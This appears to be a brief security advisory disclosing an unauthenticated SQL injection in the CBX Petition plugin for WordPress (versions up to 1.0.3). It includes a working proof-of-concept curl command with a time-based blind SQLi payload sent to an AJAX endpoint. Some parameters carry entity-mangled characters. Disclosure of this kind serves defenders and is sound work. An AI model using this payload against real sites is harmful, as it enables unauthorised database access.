CBX Petition for WordPress <= 1.0.3 - Unauthenticated SQLi

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

PoC

1. Create and publish a new petition. 2. Invoke the following curl command, with the nonce in place, to induce a 5-second sleep: curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&amp;security;=’ \ --data ‘petition_id=2133&perpage;=30&order;=xxxxxxxxx&page;=2&orderby;=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)’